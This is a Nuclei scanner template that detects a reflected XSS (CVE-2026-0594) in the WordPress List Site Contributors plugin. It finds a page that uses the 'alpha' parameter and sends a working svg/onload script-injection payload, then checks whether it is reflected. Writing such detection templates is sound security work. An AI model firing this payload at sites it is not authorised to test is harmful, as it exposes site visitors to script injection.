WordPress List Site Contributors < 1.1.8 - Reflected XSS

id: CVE-2026-0594

info:
  name: WordPress List Site Contributors < 1.1.8 - Reflected XSS
  author: m4sh_wacker
  severity: medium
  description: |
    WordPress List Site Contributors plugin < 1.1.8 contains a reflected XSS caused by insufficient sanitization and escaping of the 'alpha' parameter, letting unauthenticated attackers inject scripts, exploit requires user interaction.
  impact: |
    Unauthenticated attackers can inject scripts that execute in users browsers, potentially stealing data or performing actions on their behalf.
  remediation: Update to a version later than 1.1.8 or the latest available version.
  reference:
    - https://github.com/m4sh-wacker/CVE-2026-0594-ListSiteContributors-Plugin-Exploit
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/026a2e0d-4d30-4133-9118-055026aa9f4a?source=cve
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "plugins/list-site-contributors/"
  tags: cve,cve2026,wordpress,wp,wp-plugin,list-site-contributors,xss

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-json/wp/v2/pages HTTP/1.1
        Host: {{Hostname}}

    iterate-all: true

    extractors:
      - type: json
        name: slug
        part: body
        json:
          - '.[] | select(.content.rendered | contains("alpha=")) | .slug'
        internal: true

  - raw:
      - |
        GET /{{slug}}/?alpha=%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "svg/onload=alert(document.domain)"
# digest: 4a0a004730450220066540dc800a841bdd86d63464f8579b634ecc4c302510b5262507aeb5029bfa022100f069cff959139adc9675a8af3add226349b78aeb95767889e73e3c875198a06d:922c64590222798bb761d5b6d8e72950